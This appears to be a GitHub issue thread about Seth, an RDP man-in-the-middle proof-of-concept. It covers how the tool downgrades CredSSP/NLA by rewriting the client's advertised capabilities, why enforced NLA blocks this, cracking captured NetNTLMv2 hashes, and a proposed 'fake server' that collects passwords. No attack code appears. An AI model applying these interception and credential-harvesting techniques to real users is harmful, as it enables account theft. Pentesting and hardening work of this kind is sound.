Downgrading CredSSP works, but connection fails on subsequent SSL handshake

[AdrianVollmer]

Server Windows 2012 R2 6.3.9600 TLSv1.2 + ECDHE-RSA-AES256-SHA384: Debug Log (Client Windows 7 / 10 Login: Administrator / admin-123456) -> https://pastebin.com/Ar8Lb8pK

and

Debug Log (Windows 7 Client 6.3.9600 rdp 8.1) (Server Windows 10 10.0.14393 + NLA) (Login: admin / admin123456) -> https://pastebin.com/A9RNLEKx

[AdrianVollmer]

In these two cases, the last message is actually an "RDP negotiation failure" message, the reason being that the server insists on NLA. Cracking the NetNTLMv2 hash is the best we can do here. I'll write a patch that makes this clear to the pentester.

[armin884]

So if the server forces NLA the only thing we can do is cracking the hash and the user gets an error message?

[AdrianVollmer]

Well, yes, if you configure your setup correctly, it's secure. That's the whole point of this PoC.

However, it's only the Man in the Middle attack that becomes impossible. What we could do as an attacker is basically stop talking to the real host altogether and only talk to the client, follow the protocol up to authentication, grab the credentials and exit (it would then be a replay attack or "fake server attack"). The victim will notice that their correct password doesn't work and the attacker won't be able to grab key strokes in the following session. No big deal I guess, since at that point it's already too late.

It might be fun to add this feature as well, but it might take me a little more time.

[armin884]

Ok thanks for info. Well if you have time you can do such a feature like "fake server". Or maybe you have some deeper info when this windows login prompt shows up or not. i'm refering to this tool and this issue https://github.com/citronneur/rdpy/issues/39

[AdrianVollmer]

Regarding your question, it works like this. First, the client tells the server its capabilities, which can be standard security, enhanced security (which is simply SSL), or CredSSP (also called NLA). The server then chooses one of those (usually the highest).

So the login prompt you are talking about appears if the client is capable of NLA and if the server chooses NLA.

Seth modifies the capabilities advertised by the client on the fly. So the server thinks the client is incapable of NLA and offers just SSL. Unless you configured the server to enforce NLA, then no connection will be established, as you saw.